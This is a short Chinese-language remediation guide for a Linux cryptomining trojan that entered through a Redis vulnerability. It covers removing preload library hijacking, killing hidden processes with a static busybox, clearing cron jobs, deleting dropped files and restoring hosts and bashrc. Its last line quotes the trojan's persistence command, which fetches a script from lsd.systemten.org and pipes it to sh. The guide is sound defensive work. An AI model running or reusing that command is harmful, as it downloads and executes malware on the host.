參考:
https://www.cnblogs.com/kobexffx/p/11000337.html
利用redis漏洞獲得root權限,挖礦. 解決方法: 用普通帳號啟redis,用雲的redis
清理步驟
背景描述:
在清除過程中,由於系統動態鏈接被劫持導致無法正常操作木馬進程文件,需要把下面的動態鏈接庫文(libEGLD.so\ ld.so.preload)件移到其他地方或刪除掉。
一、移除木馬生成的動態鏈接庫,由於被修改了動態鏈接庫,系統的命令ps顯示的進程並不完全,隱藏掉了木馬進程。
mv /usr/local/lib/libEGLD.so /root/
mv /etc/ld.so.preload /root/
二、kill掉木馬進程,木馬進程名稱:
1.下載busybox (https://busybox.net/downloads/binaries/1.20.0/busybox-x86_64)
因為系統動態鏈接庫被劫持,導致系統命令不會顯示出對應木馬進程。該工具集成了linux常用命令且全為靜態編譯,不受劫持干擾。
2.利用busybox執行top 查找占用cpu高的異常進程
實例:
./busybox top
3. 找到對應進程后kill掉。
實例:
../busybox kill -9 pid
或者 ./busybox pkill 異常進程名稱
三、清除掉crontab的木馬定時任務:
1. /var/spool/cron/目錄下所有包含 lsd.systemten.org域名的記錄的文件
2. /etc/cron.d/root目錄下所有包含 lsd.systemten.org域名的記錄的文件
四,刪除木馬釋放的文件:
/usr/local/bin/writeable
/usr/libexec/writeable
/usr/bin/writeable
/etc/rc0.d/K01sshservice
/etc/rc1.d/K01sshservice
/var/spool/cron/crontabs/root
/etc/rc2.d/S01sshservice
/etc/rc3.d/S01sshservice
/etc/rc4.d/S01sshservice
/etc/rc5.d/S01sshservice
/etc/rc6.d/K01sshservice
/tmp/ccEIF3Ld.s
/tmp/ccstOJoH.o
/tmp/cc1iGERd.res
/tmp/ccgwA0Gd.c
/var/spool/cron/crontabs/tmp.XUYfjh
/tmp/.XImunix
/usr/local/sbin/sshd
/usr/lib/systemd/system/sshservice.service
/usr/local/lib/libEGLD.c
/var/spool/cron/crontabs/tmp.WtljMO
/var/spool/cron/crontabs/tmp.olDaF7
五、恢復木馬修改過的文件
1.恢復被木馬修改過的域名指向
/etc/hosts
2.刪除被木馬添加的內容
/etc/bashrc
內容: curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh